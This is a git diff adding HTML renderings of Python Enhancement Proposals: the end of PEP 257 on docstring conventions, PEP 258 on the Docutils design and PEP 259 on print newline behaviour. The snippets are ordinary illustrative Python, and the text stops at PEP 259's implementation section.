+    # Remove indentation (first line is special):
+    trimmed = [lines[0].strip()]
+    if indent < sys.maxsize:
+        for line in lines[1:]:
+            trimmed.append(line[indent:].rstrip())
+    # Strip off trailing and leading blank lines:
+    while trimmed and not trimmed[-1]:
+        trimmed.pop()
+    while trimmed and not trimmed[0]:
+        trimmed.pop(0)
+    # Return a single string:
+    return '\n'.join(trimmed)
+
+
+

The docstring in this example contains two newline characters and is +therefore 3 lines long. The first and last lines are blank:

+
def foo():
+    """
+    This is the second line of the docstring.
+    """
+
+
+

To illustrate:

+
>>> print repr(foo.__doc__)
+'\n    This is the second line of the docstring.\n    '
+>>> foo.__doc__.splitlines()
+['', '    This is the second line of the docstring.', '    ']
+>>> trim(foo.__doc__)
+'This is the second line of the docstring.'
+
+
+

Once trimmed, these docstrings are equivalent:

+
def foo():
+    """A multi-line
+    docstring.
+    """
+
+def bar():
+    """
+    A multi-line
+    docstring.
+    """
+
+
+
+
+ +
+

Acknowledgements

+

The “Specification” text comes mostly verbatim from PEP 8 +by Guido van Rossum.

+

This document borrows ideas from the archives of the Python Doc-SIG. +Thanks to all members past and present.

+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0257.rst

+

Last modified: 2024-04-17 11:35:59 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0258/index.html b/pep-0258/index.html
new file mode 100644
index 00000000000..fbc06c49038
--- /dev/null
+++ b/pep-0258/index.html
@@ -0,0 +1,980 @@
PEP 258 – Docutils Design Specification | peps.python.org
+
+


+ + +
+
+
+

PEP 258 – Docutils Design Specification

+
+
Author:
+
David Goodger <goodger at python.org>
+
Discussions-To:
+
Doc-SIG list
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Requires:
+
256, 257
+
Created:
+
31-May-2001
+
Post-History:
+
13-Jun-2001
+
+
+
+
+
+

Rejection Notice

+

While this may serve as an interesting design document for the +now-independent docutils, it is no longer slated for inclusion in the +standard library.

+
+
+

Abstract

+

This PEP documents design issues and implementation details for +Docutils, a Python Docstring Processing System (DPS). The rationale +and high-level concepts of a DPS are documented in PEP 256, “Docstring +Processing System Framework”. Also see PEP 256 for a +“Road Map to the Docstring PEPs”.

+

Docutils is being designed modularly so that any of its components can +be replaced easily. In addition, Docutils is not limited to the +processing of Python docstrings; it processes standalone documents as +well, in several contexts.

+

No changes to the core Python language are required by this PEP. Its +deliverables consist of a package for the standard library and its +documentation.

+
+
+

Specification

+
+

Docutils Project Model

+

Project components and data flow:

+
                 +---------------------------+
+                 |        Docutils:          |
+                 | docutils.core.Publisher,  |
+                 | docutils.core.publish_*() |
+                 +---------------------------+
+                  /            |            \
+                 /             |             \
+        1,3,5   /        6     |              \ 7
+       +--------+       +-------------+       +--------+
+       | READER | ----> | TRANSFORMER | ====> | WRITER |
+       +--------+       +-------------+       +--------+
+        /     \\                                  |
+       /       \\                                 |
+ 2    /      4  \\                             8  |
++-------+   +--------+                        +--------+
+| INPUT |   | PARSER |                        | OUTPUT |
++-------+   +--------+                        +--------+
+
+
+

The numbers above each component indicate the path a document’s data +takes. Double-width lines between Reader & Parser and between +Transformer & Writer indicate that data sent along these paths should +be standard (pure & unextended) Docutils doc trees. Single-width +lines signify that internal tree extensions or completely unrelated +representations are possible, but they must be supported at both ends.

+
+

Publisher

+

The docutils.core module contains a “Publisher” facade class and +several convenience functions: “publish_cmdline()” (for command-line +front ends), “publish_file()” (for programmatic use with file-like +I/O), and “publish_string()” (for programmatic use with string I/O). +The Publisher class encapsulates the high-level logic of a Docutils +system. The Publisher class has overall responsibility for +processing, controlled by the Publisher.publish() method:

+
    +
  1. Set up internal settings (may include config files & command-line +options) and I/O objects.
  2. +
  2. Call the Reader object to read data from the source Input object +and parse the data with the Parser object. A document object is +returned.
  4. +
  3. Set up and apply transforms via the Transformer object attached to +the document.
  6. +
  4. Call the Writer object which translates the document to the final +output format and writes the formatted data to the destination +Output object. Depending on the Output object, the output may be +returned from the Writer, and then from the publish() method.
  8. +
+

Calling the “publish” function (or instantiating a “Publisher” object) +with component names will result in default behavior. For custom +behavior (customizing component settings), create custom component +objects first, and pass them to the Publisher or publish_* +convenience functions.

+
+
+

Readers

+

Readers understand the input context (where the data is coming from), +send the whole input or discrete “chunks” to the parser, and provide +the context to bind the chunks together back into a cohesive whole.

+

Each reader is a module or package exporting a “Reader” class with a +“read” method. The base “Reader” class can be found in the +docutils/readers/__init__.py module.

+

Most Readers will have to be told what parser to use. So far (see the +list of examples below), only the Python Source Reader (“PySource”; +still incomplete) will be able to determine the parser on its own.

+

Responsibilities:

+
    +
  • Get input text from the source I/O.
  • +
  • Pass the input text to the parser, along with a fresh document +tree root.
  • +
+

Examples:

+
    +
  • Standalone (Raw/Plain): Just read a text file and process it. +The reader needs to be told which parser to use.

    The “Standalone Reader” has been implemented in module +docutils.readers.standalone.

    +
  • +
  • Python Source: See Python Source Reader below. This Reader is +currently in development in the Docutils sandbox.
  • +
  • Email: RFC 822 headers, quoted excerpts, signatures, MIME parts.
  • +
  • PEP: RFC 822 headers, “PEP xxxx” and “RFC xxxx” conversion to URIs. +The “PEP Reader” has been implemented in module +docutils.readers.pep; see PEP 287 and PEP 12.
  • +
  • Wiki: Global reference lookups of “wiki links” incorporated into +transforms. (CamelCase only or unrestricted?) Lazy +indentation?
  • +
  • Web Page: As standalone, but recognize meta fields as meta tags. +Support for templates of some sort? (After <body>, before +</body>?)
  • +
  • FAQ: Structured “question & answer(s)” constructs.
  • +
  • Compound document: Merge chapters into a book. Master manifest +file?
  • +
+
+
+

Parsers

+

Parsers analyze their input and produce a Docutils document tree. +They don’t know or care anything about the source or destination of +the data.

+

Each input parser is a module or package exporting a “Parser” class +with a “parse” method. The base “Parser” class can be found in the +docutils/parsers/__init__.py module.

+

Responsibilities: Given raw input text and a doctree root node, +populate the doctree by parsing the input text.

+

Example: The only parser implemented so far is for the +reStructuredText markup. It is implemented in the +docutils/parsers/rst/ package.

+

The development and integration of other parsers is possible and +encouraged.

+
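A parser can also be driven directly, without the Publisher. The sketch below populates a fresh doctree from a reStructuredText string; the helper names are from today's Docutils, not from this PEP:

from docutils.frontend import OptionParser
from docutils.parsers.rst import Parser
from docutils.utils import new_document

parser = Parser()
# Default runtime settings for the parser component only.
settings = OptionParser(components=(Parser,)).get_default_values()
# An empty doctree root; the parser populates it in-place.
document = new_document('<string>', settings)
parser.parse('A *parsed* paragraph.', document)
print(document.pformat())  # indented pseudo-XML dump of the tree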
+
+

Transformer

+

The Transformer class, in docutils/transforms/__init__.py, stores +transforms and applies them to documents. A transformer object is +attached to every new document tree. The Publisher calls +Transformer.apply_transforms() to apply all stored transforms to +the document tree. Transforms change the document tree from one form +to another, add to the tree, or prune it. Transforms resolve +references and footnote numbers, process interpreted text, and do +other context-sensitive processing.

+

Some transforms are specific to components (Readers, Parser, Writers, +Input, Output). Standard component-specific transforms are specified +in the default_transforms attribute of component classes. After +the Reader has finished processing, the Publisher calls +Transformer.populate_from_components() with a list of components +and all default transforms are stored.

+

Each transform is a class in a module in the docutils/transforms/ +package, a subclass of docutils.transforms.Transform. Transform +classes each have a default_priority attribute which is used by +the Transformer to apply transforms in order (low to high). The +default priority can be overridden when adding transforms to the +Transformer object.

+
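A minimal custom transform might look like the sketch below (the class and its behavior are hypothetical; the base class and priority mechanism are as described above):

from docutils import nodes
from docutils.transforms import Transform

class UppercaseTitles(Transform):
    """Hypothetical transform: rewrite every section title in upper case."""

    default_priority = 700  # low-to-high; runs after most standard transforms

    def apply(self):
        for title in self.document.traverse(nodes.title):
            title.parent.replace(
                title, nodes.title(text=title.astext().upper()))

Such a class would be registered with a document's Transformer (for example via add_transform()) and applied along with the other stored transforms.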

Transformer responsibilities:

+
    +
  • Apply transforms to the document tree, in priority order.
  • +
  • Store a mapping of component type name (‘reader’, ‘writer’, etc.) to +component objects. These are used by certain transforms (such as +“components.Filter”) to determine suitability.
  • +
+

Transform responsibilities:

+
    +
  • Modify a doctree in-place, either purely transforming one structure +into another, or adding new structures based on the doctree and/or +external data.
  • +
+

Examples of transforms (in the docutils/transforms/ package):

+
    +
  • frontmatter.DocInfo: Conversion of document metadata (bibliographic +information).
  • +
  • references.AnonymousHyperlinks: Resolution of anonymous references +to corresponding targets.
  • +
  • parts.Contents: Generates a table of contents for a document.
  • +
  • document.Merger: Combining multiple populated doctrees into one. +(Not yet implemented or fully understood.)
  • +
  • document.Splitter: Splits a document into a tree-structure of +subdocuments, perhaps by section. It will have to transform +references appropriately. (Neither implemented nor remotely +understood.)
  • +
  • components.Filter: Includes or excludes elements which depend on a +specific Docutils component.
  • +
+
+
+

Writers

+

Writers produce the final output (HTML, XML, TeX, etc.). Writers +translate the internal document tree structure into the final data +format, possibly running Writer-specific transforms first.

+

By the time the document gets to the Writer, it should be in final +form. The Writer’s job is simply (and only) to translate from the +Docutils doctree structure to the target format. Some small +transforms may be required, but they should be local and +format-specific.

+

Each writer is a module or package exporting a “Writer” class with a +“write” method. The base “Writer” class can be found in the +docutils/writers/__init__.py module.

+

Responsibilities:

+
    +
  • Translate doctree(s) into specific output formats.
      +
    • Transform references into format-native forms.
    • +
    +
  • +
  • Write the translated output to the destination I/O.
  • +
+

Examples:

+
    +
  • XML: Various forms, such as:
      +
    • Docutils XML (an expression of the internal document tree, +implemented as docutils.writers.docutils_xml).
    • +
    • DocBook (being implemented in the Docutils sandbox).
    • +
    +
  • +
  • HTML (XHTML implemented as docutils.writers.html4css1).
  • +
  • PDF (a ReportLabs interface is being developed in the Docutils +sandbox).
  • +
  • TeX (a LaTeX Writer is being implemented in the sandbox).
  • +
  • Docutils-native pseudo-XML (implemented as +docutils.writers.pseudoxml, used for testing).
  • +
  • Plain text
  • +
  • reStructuredText?
  • +
+
+
+

Input/Output

+

I/O classes provide a uniform API for low-level input and output. +Subclasses will exist for a variety of input/output mechanisms. +However, they can be considered an implementation detail. Most +applications should be satisfied using one of the convenience +functions associated with the Publisher.

+

I/O classes are currently in the preliminary stages; there’s a lot of +work yet to be done. Issues:

+
    +
  • How to represent multi-file input (files & directories) in the API?
  • +
  • How to represent multi-file output? Perhaps “Writer” variants, one +for each output distribution type? Or Output objects with +associated transforms?
  • +
+

Responsibilities:

+
    +
  • Read data from the input source (Input objects) or write data to the +output destination (Output objects).
  • +
+

Examples of input sources:

+
    +
  • A single file on disk or a stream (implemented as +docutils.io.FileInput).
  • +
  • Multiple files on disk (MultiFileInput?).
  • +
  • Python source files: modules and packages.
  • +
  • Python strings, as received from a client application +(implemented as docutils.io.StringInput).
  • +
+

Examples of output destinations:

+
    +
  • A single file on disk or a stream (implemented as +docutils.io.FileOutput).
  • +
  • A tree of directories and files on disk.
  • +
  • A Python string, returned to a client application (implemented as +docutils.io.StringOutput).
  • +
  • No output; useful for programmatic applications where only a portion +of the normal output is to be used (implemented as +docutils.io.NullOutput).
  • +
  • A single tree-shaped data structure in memory.
  • +
  • Some other set of data structures in memory.
  • +
+
+
+
+

Docutils Package Structure

+
    +
  • Package “docutils”.
      +
    • Module “__init__.py” contains: class “Component”, a base class for +Docutils components; class “SettingsSpec”, a base class for +specifying runtime settings (used by docutils.frontend); and class +“TransformSpec”, a base class for specifying transforms.
    • +
    • Module “docutils.core” contains facade class “Publisher” and +convenience functions. See Publisher above.
    • +
    • Module “docutils.frontend” provides runtime settings support, for +programmatic use and front-end tools (including configuration file +support, and command-line argument and option processing).
    • +
    • Module “docutils.io” provides a uniform API for low-level input +and output. See Input/Output above.
    • +
    • Module “docutils.nodes” contains the Docutils document tree +element class library plus tree-traversal Visitor pattern base +classes. See Document Tree below.
    • +
    • Module “docutils.statemachine” contains a finite state machine +specialized for regular-expression-based text filters and parsers. +The reStructuredText parser implementation is based on this +module.
    • +
    • Module “docutils.urischemes” contains a mapping of known URI +schemes (“http”, “ftp”, “mail”, etc.).
    • +
    • Module “docutils.utils” contains utility functions and classes, +including a logger class (“Reporter”; see Error Handling +below).
    • +
    • Package “docutils.parsers”: markup parsers.
        +
      • Function “get_parser_class(parser_name)” returns a parser module +by name. Class “Parser” is the base class of specific parsers. +(docutils/parsers/__init__.py)
      • +
      • Package “docutils.parsers.rst”: the reStructuredText parser.
      • +
      • Alternate markup parsers may be added.
      • +
      +

      See Parsers above.

      +
    • +
    • Package “docutils.readers”: context-aware input readers.
        +
      • Function “get_reader_class(reader_name)” returns a reader module +by name or alias. Class “Reader” is the base class of specific +readers. (docutils/readers/__init__.py)
      • +
      • Module “docutils.readers.standalone” reads independent document +files.
      • +
      • Module “docutils.readers.pep” reads PEPs (Python Enhancement +Proposals).
      • +
      • Readers to be added for: Python source code (structure & +docstrings), email, FAQ, and perhaps Wiki and others.
      • +
      +

      See Readers above.

      +
    • +
    • Package “docutils.writers”: output format writers.
        +
      • Function “get_writer_class(writer_name)” returns a writer module +by name. Class “Writer” is the base class of specific writers. +(docutils/writers/__init__.py)
      • +
      • Module “docutils.writers.html4css1” is a simple HyperText Markup +Language document tree writer for HTML 4.01 and CSS1.
      • +
      • Module “docutils.writers.docutils_xml” writes the internal +document tree in XML form.
      • +
      • Module “docutils.writers.pseudoxml” is a simple internal +document tree writer; it writes indented pseudo-XML.
      • +
      • Writers to be added: HTML 3.2 or 4.01-loose, XML (various forms, +such as DocBook), PDF, TeX, plaintext, reStructuredText, and +perhaps others.
      • +
      +

      See Writers above.

      +
    • +
    • Package “docutils.transforms”: tree transform classes.
        +
      • Class “Transformer” stores transforms and applies them to +document trees. (docutils/transforms/__init__.py)
      • +
      • Class “Transform” is the base class of specific transforms. +(docutils/transforms/__init__.py)
      • +
      • Each module contains related transform classes.
      • +
      +

      See Transforms above.

      +
    • +
    • Package “docutils.languages”: Language modules contain +language-dependent strings and mappings. They are named for their +language identifier (as defined in Choice of Docstring Format +below), converting dashes to underscores.
        +
      • Function “get_language(language_code)”, returns matching +language module. (docutils/languages/__init__.py)
      • +
      • Modules: en.py (English), de.py (German), fr.py (French), it.py +(Italian), sk.py (Slovak), sv.py (Swedish).
      • +
      • Other languages to be added.
      • +
      +
    • +
    +
  • +
  • Third-party modules: “extras” directory. These modules are +installed only if they’re not already present in the Python +installation.
      +
    • extras/optparse.py and extras/textwrap.py provide +option parsing and command-line help; from Greg Ward’s +http://optik.sf.net/ project, included for convenience.
    • +
    • extras/roman.py contains Roman numeral conversion routines.
    • +
    +
  • +
+
+
+

Front-End Tools

+

The tools/ directory contains several front ends for common +Docutils processing. See Docutils Front-End Tools for details.

+
+
+

Document Tree

+

A single intermediate data structure is used internally by Docutils, +in the interfaces between components; it is defined in the +docutils.nodes module. It is not required that this data +structure be used internally by any of the components, just +between components as outlined in the diagram in the Docutils +Project Model above.

+

Custom node types are allowed, provided that either (a) a transform +converts them to standard Docutils nodes before they reach the Writer +proper, or (b) the custom node is explicitly supported by certain +Writers, and is wrapped in a filtered “pending” node. An example of +condition (a) is the Python Source Reader (see below), where a +“stylist” transform converts custom nodes. The HTML <meta> tag is +an example of condition (b); it is supported by the HTML Writer but +not by others. The reStructuredText “meta” directive creates a +“pending” node, which contains knowledge that the embedded “meta” node +can only be handled by HTML-compatible writers. The “pending” node is +resolved by the docutils.transforms.components.Filter transform, +which checks that the calling writer supports HTML; if it doesn’t, the +“pending” node (and enclosed “meta” node) is removed from the +document.

+

The document tree data structure is similar to a DOM tree, but with +specific node names (classes) instead of DOM’s generic nodes. The +schema is documented in an XML DTD (eXtensible Markup Language +Document Type Definition), which comes in two parts:

+ +

The DTD defines a rich set of elements, suitable for many input and +output formats. The DTD retains all information necessary to +reconstruct the original input text, or a reasonable facsimile +thereof.

+

See The Docutils Document Tree for details (incomplete).

+
+
+

Error Handling

+

When the parser encounters an error in markup, it inserts a system +message (DTD element “system_message”). There are five levels of +system messages:

+
    +
  • Level-0, “DEBUG”: an internal reporting issue. There is no effect +on the processing. Level-0 system messages are handled separately +from the others.
  • +
  • Level-1, “INFO”: a minor issue that can be ignored. There is little +or no effect on the processing. Typically level-1 system messages +are not reported.
  • +
  • Level-2, “WARNING”: an issue that should be addressed. If ignored, +there may be minor problems with the output. Typically level-2 +system messages are reported but do not halt processing.
  • +
  • Level-3, “ERROR”: a major issue that should be addressed. If +ignored, the output will contain unpredictable errors. Typically +level-3 system messages are reported but do not halt processing.
  • +
  • Level-4, “SEVERE”: a critical error that must be addressed. +Typically level-4 system messages are turned into exceptions which +halt processing. If ignored, the output will contain severe errors.
  • +
+

Although the initial message levels were devised independently, they +have a strong correspondence to VMS error condition severity +levels; the names in quotes for levels 1 through 4 were borrowed +from VMS. Error handling has since been influenced by the log4j +project.

+
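In today's Docutils the reporting and halting thresholds are exposed as runtime settings; a small sketch (the setting names come from the current implementation, not from this PEP's text):

from docutils.core import publish_string

source = "`unclosed interpreted text\n"   # provokes a level-2 WARNING
output = publish_string(
    source=source,
    writer_name="pseudoxml",
    # Report only ERROR (3) and SEVERE (4); raise an exception only
    # for SEVERE problems.
    settings_overrides={"report_level": 3, "halt_level": 4},
)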
+
+

Python Source Reader

+

The Python Source Reader (“PySource”) is the Docutils component that +reads Python source files, extracts docstrings in context, then +parses, links, and assembles the docstrings into a cohesive whole. It +is a major and non-trivial component, currently under experimental +development in the Docutils sandbox. High-level design issues are +presented here.

+
+

Processing Model

+

This model will evolve over time, incorporating experience and +discoveries.

+
    +
  1. The PySource Reader uses an Input class to read in Python packages +and modules, into a tree of strings.
  2. +
  2. The Python modules are parsed, converting the tree of strings into +a tree of abstract syntax trees with docstring nodes.
  4. +
  3. The abstract syntax trees are converted into an internal +representation of the packages/modules. Docstrings are extracted, +as well as code structure details. See AST Mining below. +Namespaces are constructed for lookup in step 6.
  6. +
  4. One at a time, the docstrings are parsed, producing standard +Docutils doctrees.
  8. +
  5. PySource assembles all the individual docstrings’ doctrees into a +Python-specific custom Docutils tree paralleling the +package/module/class structure; this is a custom Reader-specific +internal representation (see the Docutils Python Source DTD). +Namespaces must be merged: Python identifiers, hyperlink targets.
  10. +
  6. Cross-references from docstrings (interpreted text) to Python +identifiers are resolved according to the Python namespace lookup +rules. See Identifier Cross-References below.
  12. +
  7. A “Stylist” transform is applied to the custom doctree (by the +Transformer), custom nodes are rendered using standard nodes as +primitives, and a standard document tree is emitted. See Stylist +Transforms below.
  14. +
  8. Other transforms are applied to the standard doctree by the +Transformer.
  16. +
  9. The standard doctree is sent to a Writer, which translates the +document into a concrete format (HTML, PDF, etc.).
  18. +
  10. The Writer uses an Output class to write the resulting data to its +destination (disk file, directories and files, etc.).
  20. +
+
+
+

AST Mining

+

Abstract Syntax Tree mining code will be written (or adapted) that +scans a parsed Python module, and returns an ordered tree containing +the names, docstrings (including attribute and additional docstrings; +see below), and additional info (in parentheses below) of all of the +following objects:

+
    +
  • packages
  • +
  • modules
  • +
  • module attributes (+ initial values)
  • +
  • classes (+ inheritance)
  • +
  • class attributes (+ initial values)
  • +
  • instance attributes (+ initial values)
  • +
  • methods (+ parameters & defaults)
  • +
  • functions (+ parameters & defaults)
  • +
+

(Extract comments too? For example, comments at the start of a module +would be a good place for bibliographic field lists.)

+

In order to evaluate interpreted text cross-references, namespaces for +each of the above will also be required.

+

See the python-dev/docstring-develop thread “AST mining”, started on +2001-08-14.

+
+
+

Docstring Extraction Rules

+
    +
  1. What to examine:
      +
    a. If the “__all__” variable is present in the module being +documented, only identifiers listed in “__all__” are +examined for docstrings.
    2. +
    b. In the absence of “__all__”, all identifiers are examined, +except those whose names are private (names begin with “_” but +don’t begin and end with “__”).
    4. +
    c. 1a and 1b can be overridden by runtime settings.
    6. +
    +
  2. +
  2. Where:

    Docstrings are string literal expressions, and are recognized in +the following places within Python modules:

    +
      +
    a. At the beginning of a module, function definition, class +definition, or method definition, after any comments. This is +the standard for Python __doc__ attributes.
    2. +
    b. Immediately following a simple assignment at the top level of a +module, class definition, or __init__ method definition, +after any comments. See Attribute Docstrings below.
    4. +
    c. Additional string literals found immediately after the +docstrings in (a) and (b) will be recognized, extracted, and +concatenated. See Additional Docstrings below.
    6. +
    d. @@@ 2.2-style “properties” with attribute docstrings? Wait for +syntax?
    8. +
    +
  4. +
  3. How:

    Whenever possible, Python modules should be parsed by Docutils, not +imported. There are several reasons:

    +
      +
    • Importing untrusted code is inherently insecure.
    • +
    • Information from the source is lost when using introspection to +examine an imported module, such as comments and the order of +definitions.
    • +
    • Docstrings are to be recognized in places where the byte-code +compiler ignores string literal expressions (2b and 2c above), +meaning importing the module will lose these docstrings.
    • +
    +

    Of course, standard Python parsing tools such as the “parser” +library module should be used.

    +

    When the Python source code for a module is not available +(i.e. only the .pyc file exists) or for C extension modules, to +access docstrings the module can only be imported, and any +limitations must be lived with.

    +
  6. +
+

Since attribute docstrings and additional docstrings are ignored by +the Python byte-code compiler, no namespace pollution or runtime bloat +will result from their use. They are not assigned to __doc__ or +to any other attribute. The initial parsing of a module may take a +slight performance hit.

+
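The parse-don't-import approach is easy to demonstrate with the modern standard library (a sketch using the ast module, which postdates this PEP; the file name is hypothetical):

import ast

with open("example.py") as f:
    tree = ast.parse(f.read())

# The module docstring, recovered without importing (hence without
# executing) the module.
print(ast.get_docstring(tree))

# Docstrings of top-level functions and classes, in source order.
for node in tree.body:
    if isinstance(node, (ast.FunctionDef, ast.ClassDef)):
        print(node.name, repr(ast.get_docstring(node)))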
+
Attribute Docstrings
+

(This is a simplified version of PEP 224.)

+

A string literal immediately following an assignment statement is +interpreted by the docstring extraction machinery as the docstring of +the target of the assignment statement, under the following +conditions:

+
    +
  1. The assignment must be in one of the following contexts:
      +
    a. At the top level of a module (i.e., not nested inside a compound +statement such as a loop or conditional): a module attribute.
    2. +
    b. At the top level of a class definition: a class attribute.
    4. +
    c. At the top level of the “__init__” method definition of a +class: an instance attribute. Instance attributes assigned in +other methods are assumed to be implementation details. (@@@ +__new__ methods?)
    6. +
    d. A function attribute assignment at the top level of a module or +class definition.
    8. +
    +

    Since each of the above contexts is at the top level (i.e., in the +outermost suite of a definition), it may be necessary to place +dummy assignments for attributes assigned conditionally or in a +loop.

    +
  2. +
  2. The assignment must be to a single target, not to a list or a tuple +of targets.
  4. +
  3. The form of the target:
      +
    a. For contexts 1a and 1b above, the target must be a simple +identifier (not a dotted identifier, a subscripted expression, +or a sliced expression).
    2. +
    b. For context 1c above, the target must be of the form +“self.attrib”, where “self” matches the “__init__” +method’s first parameter (the instance parameter) and “attrib” +is a simple identifier as in 3a.
    4. +
    c. For context 1d above, the target must be of the form +“name.attrib”, where “name” matches an already-defined +function or method name and “attrib” is a simple identifier as +in 3a.
    6. +
    +
  6. +
+

Blank lines may be used after attribute docstrings to emphasize the +connection between the assignment and the docstring.

+

Examples:

+
g = 'module attribute (module-global variable)'
+"""This is g's docstring."""
+
+class AClass:
+
+    c = 'class attribute'
+    """This is AClass.c's docstring."""
+
+    def __init__(self):
+        """Method __init__'s docstring."""
+
+        self.i = 'instance attribute'
+        """This is self.i's docstring."""
+
+def f(x):
+    """Function f's docstring."""
+    return x**2
+
+f.a = 1
+"""Function attribute f.a's docstring."""
+
+
+
+
+
Additional Docstrings
+

(This idea was adapted from PEP 216.)

+

Many programmers would like to make extensive use of docstrings for +API documentation. However, docstrings do take up space in the +running program, so some programmers are reluctant to “bloat up” their +code. Also, not all API documentation is applicable to interactive +environments, where __doc__ would be displayed.

+

Docutils’ docstring extraction tools will concatenate all string +literal expressions which appear at the beginning of a definition or +after a simple assignment. Only the first strings in definitions will +be available as __doc__, and can be used for brief usage text +suitable for interactive sessions; subsequent string literals and all +attribute docstrings are ignored by the Python byte-code compiler and +may contain more extensive API information.

+

Example:

+
def function(arg):
+    """This is __doc__, function's docstring."""
+    """
+    This is an additional docstring, ignored by the byte-code
+    compiler, but extracted by Docutils.
+    """
+    pass
+
+
+ +
+
+
+

Choice of Docstring Format

+

Rather than force everyone to use a single docstring format, multiple +input formats are allowed by the processing system. A special +variable, __docformat__, may appear at the top level of a module +before any function or class definitions. Over time or through +decree, a standard format or set of formats should emerge.

+

A module’s __docformat__ variable only applies to the objects +defined in the module’s file. In particular, the __docformat__ +variable in a package’s __init__.py file does not apply to objects +defined in subpackages and submodules.

+

The __docformat__ variable is a string containing the name of the +format being used, a case-insensitive string matching the input +parser’s module or package name (i.e., the same name as required to +“import” the module or package), or a registered alias. If no +__docformat__ is specified, the default format is “plaintext” for +now; this may be changed to the standard format if one is ever +established.

+

The __docformat__ string may contain an optional second field, +separated from the format name (first field) by a single space: a +case-insensitive language identifier as defined in RFC 1766. A +typical language identifier consists of a 2-letter language code from +ISO 639 (3-letter codes used only if no 2-letter code exists; +RFC 1766 is currently being revised to allow 3-letter codes). If no +language identifier is specified, the default is “en” for English. +The language identifier is passed to the parser and can be used for +language-dependent markup features.

+
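For example, a module using this convention might begin as follows (a minimal sketch):

"""Widget-frobnicating utilities, documented in reStructuredText."""

__docformat__ = 'restructuredtext en'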
+
+

Identifier Cross-References

+

In Python docstrings, interpreted text is used to classify and mark up +program identifiers, such as the names of variables, functions, +classes, and modules. If the identifier alone is given, its role is +inferred implicitly according to the Python namespace lookup rules. +For functions and methods (even when dynamically assigned), +parentheses (‘()’) may be included:

+
This function uses `another()` to do its work.
+
+
+

For class, instance and module attributes, dotted identifiers are used +when necessary. For example (using reStructuredText markup):

+
class Keeper(Storer):
+
+    """
+    Extend `Storer`.  Class attribute `instances` keeps track
+    of the number of `Keeper` objects instantiated.
+    """
+
+    instances = 0
+    """How many `Keeper` objects are there?"""
+
+    def __init__(self):
+        """
+        Extend `Storer.__init__()` to keep track of instances.
+
+        Keep count in `Keeper.instances`, data in `self.data`.
+        """
+        Storer.__init__(self)
+        Keeper.instances += 1
+
+        self.data = []
+        """Store data in a list, most recent last."""
+
+    def store_data(self, data):
+        """
+        Extend `Storer.store_data()`; append new `data` to a
+        list (in `self.data`).
+        """
+        self.data.append(data)
+
+
+

Each of the identifiers quoted with backquotes (“`”) will become +references to the definitions of the identifiers themselves.

+
+
+

Stylist Transforms

+

Stylist transforms are specialized transforms specific to the PySource +Reader. The PySource Reader doesn’t have to make any decisions as to +style; it just produces a logically constructed document tree, parsed +and linked, including custom node types. Stylist transforms +understand the custom nodes created by the Reader and convert them +into standard Docutils nodes.

+

Multiple Stylist transforms may be implemented and one can be chosen +at runtime (through a “--style” or “--stylist” command-line option). +Each Stylist transform implements a different layout or style; thus +the name. They decouple the context-understanding part of the Reader +from the layout-generating part of processing, resulting in a more +flexible and robust system. This also serves to “separate style from +content”, the SGML/XML ideal.

+

By keeping the piece of code that does the styling small and modular, +it becomes much easier for people to roll their own styles. The +“barrier to entry” is too high with existing tools; extracting the +stylist code will lower the barrier considerably.

+
+
+
+
+

Project Web Site

+

A SourceForge project has been set up for this work at +http://docutils.sourceforge.net/.

+
+ +
+

Acknowledgements

+

This document borrows ideas from the archives of the Python +Doc-SIG. Thanks to all members past & present.

+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0258.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0259/index.html b/pep-0259/index.html
new file mode 100644
index 00000000000..e503837479a
--- /dev/null
+++ b/pep-0259/index.html
@@ -0,0 +1,245 @@
PEP 259 – Omit printing newline after newline | peps.python.org
+
+


+ + +
+
+
+

PEP 259 – Omit printing newline after newline

+
+
Author:
+
Guido van Rossum <guido at python.org>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
11-Jun-2001
+
Python-Version:
+
2.2
+
Post-History:
+
11-Jun-2001
+
+
+
+
+
+

Abstract

+

Currently, the print statement always appends a newline, unless a +trailing comma is used. This means that if we want to print data +that already ends in a newline, we get two newlines, unless +special precautions are taken.

+

I propose to skip printing the newline when it follows a newline +that came from data.

+

In order to avoid having to add yet another magic variable to file +objects, I propose to give the existing ‘softspace’ variable an +extra meaning: a negative value will mean “the last data written +ended in a newline so no space or newline is required.”

+
+
+

Problem

+

When printing data that resembles the lines read from a file using +a simple loop, double-spacing occurs unless special care is taken:

+
>>> for line in open("/etc/passwd").readlines():
+... print line
+...
+root:x:0:0:root:/root:/bin/bash
+
+bin:x:1:1:bin:/bin:
+
+daemon:x:2:2:daemon:/sbin:
+
+(etc.)
+
+>>>
+
+
+

While there are easy work-arounds, this is often noticed only +during testing and requires an extra edit-test roundtrip; the +fixed code is uglier and harder to maintain.

+
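The usual work-arounds look like this (Python 2, matching the example above):

for line in open("/etc/passwd").readlines():
    print line,                 # trailing comma suppresses the newline

for line in open("/etc/passwd").readlines():
    print line.rstrip("\n")     # or strip the newline from the data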
+
+

Proposed Solution

+

In the PRINT_ITEM opcode in ceval.c, when a string object is +printed, a check is already made that looks at the last character +of that string. Currently, if that last character is a whitespace +character other than space, the softspace flag is reset to zero; +this suppresses the space between two items if the first item is a +string ending in newline, tab, etc. (but not when it ends in a +space). Otherwise the softspace flag is set to one.

+

The proposal changes this test slightly so that softspace is set +to:

+
    +
  • -1 – if the last object written is a string ending in a +newline
  • +
  • 0 – if the last object written is a string ending in a +whitespace character that’s neither space nor newline
  • +
  • 1 – in all other cases (including the case when the last +object written is an empty string or not a string)
  • +
+

Then, in the PRINT_NEWLINE opcode, printing of the newline is +suppressed if the value of softspace is negative; in any case the +softspace flag is reset to zero.

+
+
+

Scope

+

This only affects printing of 8-bit strings. It doesn’t affect +Unicode, although that could be considered a bug in the Unicode +implementation. It doesn’t affect other objects whose string +representation happens to end in a newline character.

+
+
+

Risks

+

This change breaks some existing code. For example:

+
print "Subject: PEP 259\n"
+print message_body
+
+
+

In current Python, this produces a blank line separating the +subject from the message body; with the proposed change, the body +begins immediately below the subject. This is not very robust +code anyway; it is better written as:

+
print "Subject: PEP 259"
+print
+print message_body
+
+
+

In the test suite, only test_StringIO (which explicitly tests for +this feature) breaks.

+
+
+

Implementation

+

A patch relative to current CVS is here:

+
